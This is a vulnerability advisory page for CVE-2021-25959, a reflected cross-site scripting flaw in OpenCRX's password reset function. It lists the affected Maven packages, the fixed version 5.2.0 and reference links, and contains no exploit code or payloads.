Moderate severityNVD Advisory· Published Sep 29, 2021· Updated Sep 16, 2024
OpenCRX - Reflected Cross-Site Scripting in Password Reset Functionality
CVE-2021-25959
Description
In OpenCRX, versions v4.0.0 through v5.1.0 are vulnerable to reflected Cross-site Scripting (XSS), due to unsanitized parameters in the password reset functionality. This allows execution of external javascript files on any user of the openCRX instance.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.opencrx:opencrx-coreMaven | >= 4.0.0, < 5.2.0 | 5.2.0 |
org.opencrx:opencrx-core-modelsMaven | >= 4.0.0, < 5.2.0 | 5.2.0 |
org.opencrx:opencrx-core-configMaven | >= 4.0.0, < 5.2.0 | 5.2.0 |
org.opencrx:opencrx-clientMaven | >= 4.0.0, < 5.2.0 | 5.2.0 |
org.opencrx:opencrx-gradleMaven | >= 4.0.0, < 5.2.0 | 5.2.0 |
Affected products
6- ghsa-coords5 versionspkg:maven/org.opencrx/opencrx-clientpkg:maven/org.opencrx/opencrx-corepkg:maven/org.opencrx/opencrx-core-configpkg:maven/org.opencrx/opencrx-core-modelspkg:maven/org.opencrx/opencrx-gradle
>= 4.0.0, < 5.2.0+ 4 more
- (no CPE)range: >= 4.0.0, < 5.2.0
- (no CPE)range: >= 4.0.0, < 5.2.0
- (no CPE)range: >= 4.0.0, < 5.2.0
- (no CPE)range: >= 4.0.0, < 5.2.0
- (no CPE)range: >= 4.0.0, < 5.2.0
- org.opencrx/opencrx-core-configv5Range: 4.0.0
Patches
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- github.com/advisories/GHSA-rwh9-8xx8-4wfmghsaADVISORY
- github.com/opencrx/opencrx/commit/14e75f95e5f56fbe7ee897bdf5d858788072e818ghsax_refsource_MISCWEB
- www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25959ghsax_refsource_MISCWEB
News mentions
0No linked articles in our index yet.